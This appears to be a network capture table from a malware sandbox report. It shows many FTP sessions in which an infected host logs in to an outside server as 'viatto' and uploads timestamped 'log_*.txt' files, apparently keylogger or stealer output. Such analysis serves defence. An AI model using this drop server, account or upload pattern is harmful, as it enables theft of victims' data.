                                                                                                                                    Oct 10, 2022 06:02:20.068037987 CEST4972121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:20.095102072 CEST2149721185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:20.095335960 CEST4972121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:20.121774912 CEST2149721185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:20.122056961 CEST4972121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:20.147492886 CEST2149721185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:20.150973082 CEST4972121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:20.177304029 CEST2149721185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:20.182864904 CEST4972121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:20.206842899 CEST2149721185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:20.208796978 CEST4972121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:20.236392021 CEST2149721185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,4)
                                                                                                                                    Oct 10, 2022 06:02:20.265703917 CEST4972121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.10.txt
                                                                                                                                    Oct 10, 2022 06:02:20.294610023 CEST2149721185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:20.334836960 CEST2149721185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:20.598759890 CEST2149723185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:20.598793030 CEST2149723185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:20.598809958 CEST2149723185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:20.599176884 CEST4972321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:20.623548985 CEST2149723185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:20.625179052 CEST4972321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:20.649525881 CEST2149723185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:20.651180029 CEST4972321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:20.675566912 CEST2149723185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:20.675878048 CEST4972321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:20.699644089 CEST2149723185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:20.702254057 CEST4972321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:20.727057934 CEST2149723185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:20.730667114 CEST4972321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:20.756170034 CEST2149723185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,6)
                                                                                                                                    Oct 10, 2022 06:02:20.784125090 CEST4972321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.11.txt
                                                                                                                                    Oct 10, 2022 06:02:20.809187889 CEST2149723185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:20.834626913 CEST2149723185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:21.070777893 CEST2149725185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:21.070827961 CEST2149725185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:21.070961952 CEST2149725185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:21.072568893 CEST4972521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:21.097151041 CEST2149725185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:21.097409964 CEST4972521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:21.121596098 CEST2149725185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:21.121958971 CEST4972521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:21.145585060 CEST2149725185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:21.149969101 CEST4972521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:21.177587986 CEST2149725185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:21.179585934 CEST4972521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:21.203413010 CEST2149725185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:21.205468893 CEST4972521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:21.230734110 CEST2149725185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,7)
                                                                                                                                    Oct 10, 2022 06:02:21.261368036 CEST4972521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.12.txt
                                                                                                                                    Oct 10, 2022 06:02:21.285797119 CEST2149725185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:21.324950933 CEST2149725185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:21.517694950 CEST2149727185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:21.517745018 CEST2149727185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:21.517837048 CEST2149727185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:21.518086910 CEST4972721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:21.542439938 CEST2149727185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:21.542834044 CEST4972721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:21.566992998 CEST2149727185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:21.567437887 CEST4972721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:21.591176987 CEST2149727185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:21.595412016 CEST4972721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:21.620280027 CEST2149727185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:21.630623102 CEST4972721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:21.654696941 CEST2149727185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:21.657152891 CEST4972721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:21.681212902 CEST2149727185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,8)
                                                                                                                                    Oct 10, 2022 06:02:21.706810951 CEST4972721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.13.txt
                                                                                                                                    Oct 10, 2022 06:02:21.731276035 CEST2149727185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:21.762485981 CEST2149727185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:21.945817947 CEST2149729185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:21.945863962 CEST2149729185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:21.945895910 CEST2149729185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:21.947058916 CEST4972921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:21.970349073 CEST2149729185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:21.978624105 CEST4972921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:22.001770020 CEST2149729185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:22.001983881 CEST4972921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:22.025212049 CEST2149729185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:22.027230024 CEST4972921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:22.050837040 CEST2149729185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:22.052452087 CEST4972921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:22.075627089 CEST2149729185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:22.085787058 CEST4972921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:22.109639883 CEST2149729185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,9)
                                                                                                                                    Oct 10, 2022 06:02:22.134377003 CEST4972921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.14.txt
                                                                                                                                    Oct 10, 2022 06:02:22.158143044 CEST2149729185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:22.182677031 CEST2149729185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:22.390857935 CEST2149731185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:22.390938044 CEST2149731185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:22.390969038 CEST2149731185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:22.391567945 CEST4973121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:22.419006109 CEST2149731185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:22.426326036 CEST4973121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:22.450233936 CEST2149731185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:22.451421022 CEST4973121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:22.478276014 CEST2149731185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:22.478773117 CEST4973121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:22.503679037 CEST2149731185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:22.515029907 CEST4973121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:22.541374922 CEST2149731185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:22.542632103 CEST4973121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:22.568861008 CEST2149731185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,10)
                                                                                                                                    Oct 10, 2022 06:02:22.593022108 CEST4973121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.15.txt
                                                                                                                                    Oct 10, 2022 06:02:22.619286060 CEST2149731185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:22.653932095 CEST2149731185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:22.835539103 CEST2149733185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:22.835582018 CEST2149733185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:22.836086988 CEST2149733185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:22.836231947 CEST4973321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:22.859236956 CEST2149733185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:22.859505892 CEST4973321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:22.882893085 CEST2149733185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:22.883388042 CEST4973321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:22.906385899 CEST2149733185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:22.907308102 CEST4973321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:22.930854082 CEST2149733185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:22.932164907 CEST4973321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:22.955303907 CEST2149733185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:22.971191883 CEST4973321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:22.994652033 CEST2149733185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,11)
                                                                                                                                    Oct 10, 2022 06:02:23.020668030 CEST4973321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.16.txt
                                                                                                                                    Oct 10, 2022 06:02:23.045003891 CEST2149733185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:23.070126057 CEST2149733185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:23.338378906 CEST2149735185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:23.339214087 CEST2149735185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:23.339265108 CEST2149735185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:23.339471102 CEST4973521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:23.362502098 CEST2149735185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:23.362787962 CEST4973521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:23.385737896 CEST2149735185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:23.386008024 CEST4973521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:23.409091949 CEST2149735185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:23.409378052 CEST4973521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:23.432935953 CEST2149735185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:23.433495045 CEST4973521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:23.456430912 CEST2149735185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:23.457434893 CEST4973521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:23.480895996 CEST2149735185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,12)
                                                                                                                                    Oct 10, 2022 06:02:23.505410910 CEST4973521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.17.txt
                                                                                                                                    Oct 10, 2022 06:02:23.530968904 CEST2149735185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:23.558945894 CEST2149735185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:23.765510082 CEST2149737185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:23.765556097 CEST2149737185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:23.765587091 CEST2149737185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:23.765923023 CEST4973721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:23.788806915 CEST2149737185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:23.789068937 CEST4973721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:23.811860085 CEST2149737185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:23.812150955 CEST4973721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:23.834942102 CEST2149737185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:23.835231066 CEST4973721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:23.858526945 CEST2149737185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:23.859030962 CEST4973721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:23.881634951 CEST2149737185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:23.882631063 CEST4973721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:23.905857086 CEST2149737185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,14)
                                                                                                                                    Oct 10, 2022 06:02:23.930340052 CEST4973721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.18.txt
                                                                                                                                    Oct 10, 2022 06:02:23.953625917 CEST2149737185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:23.989465952 CEST2149737185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:24.210303068 CEST2149739185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:24.210355043 CEST2149739185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:24.210500956 CEST2149739185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:24.210771084 CEST4973921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:24.234966993 CEST2149739185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:24.235235929 CEST4973921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:24.259916067 CEST2149739185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:24.263212919 CEST4973921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:24.287812948 CEST2149739185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:24.288301945 CEST4973921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:24.312901974 CEST2149739185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:24.313385010 CEST4973921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:24.337122917 CEST2149739185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:24.339052916 CEST4973921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:24.363744020 CEST2149739185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,15)
                                                                                                                                    Oct 10, 2022 06:02:24.389573097 CEST4973921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.19.txt
                                                                                                                                    Oct 10, 2022 06:02:24.415540934 CEST2149739185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:24.440924883 CEST2149739185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:24.648461103 CEST2149741185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:24.648507118 CEST2149741185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:24.648539066 CEST2149741185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:24.648897886 CEST4974121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:24.676702976 CEST2149741185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:24.677252054 CEST4974121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:24.703299999 CEST2149741185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:24.707653046 CEST4974121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:24.735112906 CEST2149741185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:24.735526085 CEST4974121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:24.762495995 CEST2149741185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:24.763637066 CEST4974121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:24.791687012 CEST2149741185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:24.795716047 CEST4974121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:24.824875116 CEST2149741185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,16)
                                                                                                                                    Oct 10, 2022 06:02:24.851269960 CEST4974121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.20.txt
                                                                                                                                    Oct 10, 2022 06:02:24.877536058 CEST2149741185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:24.903760910 CEST2149741185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:25.124284029 CEST2149743185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:25.124334097 CEST2149743185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:25.124422073 CEST2149743185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:25.124893904 CEST4974321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:25.148047924 CEST2149743185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:25.150553942 CEST4974321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:25.173783064 CEST2149743185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:25.174191952 CEST4974321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:25.197455883 CEST2149743185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:25.197865009 CEST4974321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:25.221245050 CEST2149743185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:25.222297907 CEST4974321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:25.245145082 CEST2149743185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:25.248389959 CEST4974321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:25.272140026 CEST2149743185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,17)
                                                                                                                                    Oct 10, 2022 06:02:25.302752018 CEST4974321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.21.txt
                                                                                                                                    Oct 10, 2022 06:02:25.326240063 CEST2149743185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:25.350950003 CEST2149743185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:25.559611082 CEST2149745185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:25.559639931 CEST2149745185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:25.559653044 CEST2149745185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:25.560300112 CEST4974521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:25.585230112 CEST2149745185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:25.585829973 CEST4974521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:25.610486031 CEST2149745185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:25.610757113 CEST4974521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:25.636245966 CEST2149745185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:25.636636972 CEST4974521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:25.661047935 CEST2149745185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:25.662146091 CEST4974521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:25.687202930 CEST2149745185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:25.688616991 CEST4974521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:25.714704990 CEST2149745185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,19)
                                                                                                                                    Oct 10, 2022 06:02:25.738285065 CEST4974521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.22.txt
                                                                                                                                    Oct 10, 2022 06:02:25.763020992 CEST2149745185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:25.823066950 CEST2149745185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:26.015989065 CEST2149747185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:26.016052961 CEST2149747185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:26.016233921 CEST2149747185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:26.016446114 CEST4974721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:26.039206028 CEST2149747185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:26.039613008 CEST4974721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:26.062460899 CEST2149747185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:26.062753916 CEST4974721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:26.085414886 CEST2149747185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:26.085777044 CEST4974721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:26.109057903 CEST2149747185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:26.109786987 CEST4974721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:26.133687973 CEST2149747185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:26.154716015 CEST4974721192.168.2.3185.106.92.60PASV
